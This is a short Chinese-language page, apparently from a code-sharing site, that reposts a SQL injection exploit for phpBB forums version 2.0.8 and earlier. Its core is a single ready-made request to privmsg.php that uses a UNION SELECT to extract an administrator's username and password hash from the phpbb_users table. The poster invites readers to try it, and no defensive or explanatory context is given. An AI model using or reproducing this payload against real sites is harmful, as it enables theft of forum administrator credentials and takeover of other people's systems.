phpbb 小于等于2.0.8 sql injection.txt

来自「一些可以实现益出的程序」· 文本 代码 · 共 12 行

TXT
12
字号
原文标题是:SQL-инъекция в PhpBB <=2.0.8 中间是俄文,看不懂,但估计是SQL Injection,谁方便的可测试下。PhpBB 是款免费的PHP论坛,支持多种数据库,国内有一定的用户群。

代码:


site.com/phpBB/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,
null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null%20FROM%20phpbb_users%20WHERE%20user_level=1%20LIMIT%201/* 


⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?